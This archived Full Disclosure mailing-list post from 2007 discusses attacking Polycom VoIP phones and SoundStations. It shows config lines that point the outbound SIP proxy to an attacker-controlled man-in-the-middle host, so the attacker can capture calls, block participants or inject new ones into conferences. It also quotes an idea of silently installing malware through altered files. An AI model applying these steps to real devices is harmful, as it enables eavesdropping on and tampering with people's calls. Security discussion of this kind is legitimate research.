Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Polycom hacking
From: "J. Oquendo" <sil () infiltrated net>
Date: Tue, 26 Jun 2007 14:52:50 -0400

Paul Schmehl wrote:

Thanks. I'm not that interested in DoSes, but I'm thinking that you could mget the entire contents, alter them to your satisfaction and then mput them. Don't know how much memory these things have yet, but you ought to be able to iframe silent installs of malware, script the capture of all audio and video traffic from/to the device, etc. Could be quite interesting.


On that level you could just use a MITM proxy: phone.cfg (removed html brackets)

xml version="1.0" encoding="UTF-8" standalone="yes"
phone102
 reg
   reg.1.displayName="666"
   reg.1.address="666"
   reg.1.label="666"
   reg.1.type="private"
   reg.1.lcs=""
   reg.1.thirdPartyName=""
   reg.1.auth.userId="666"
   reg.1.auth.password="666"
   reg.1.server.1.address="original.server.ip"
   reg.1.server.1.port="5060"
   reg.1.server.1.transport="UDPonly"
   reg.1.server.1.expires="1800"
   reg.1.server.1.expires.overlap=""
   reg.1.server.1.register="1"
   reg.1.outboundProxy.address="man.in.the.middle.proxy"
   reg.1.outboundProxy.port="5060"
   reg.1.outboundProxy.transport=""
   reg.1.ringType="2"
   reg.1.lineKeys=""
   reg.1.callsPerLineKey=""

//  stripped the rest...

Where reg.1.server.1.address= points back at their PBX/H323
server. The problem with this would lie on the networking
side. Local without VLANs... Not a problem. Remotely, would
take some work but its doable. Polycoms are horrible when
it comes to doing network address translation and many set
them up in dirty DMZ's to get them to work.

Soundstations use the same XML files as the phones do. In sip.cfg:

outboundProxy voIpProt.SIP.outboundProxy.address="" voIpProt.SIP.outboundProxy.port="5060" voIpProt.SIP.outboundProxy.transport="DNSnaptr"

Obvious entries to fill... Would work like this:

Registration and subsequent connection(s):
Soundstation --> AttackerProxy --> RealServer

With AttackerProxy looking at traffic you could recompile data,
block hosts from the conference, inject new participants, etc.

====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'
"Wise men talk because they have something to say;
fools, because they have to say something." -- Plato


Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault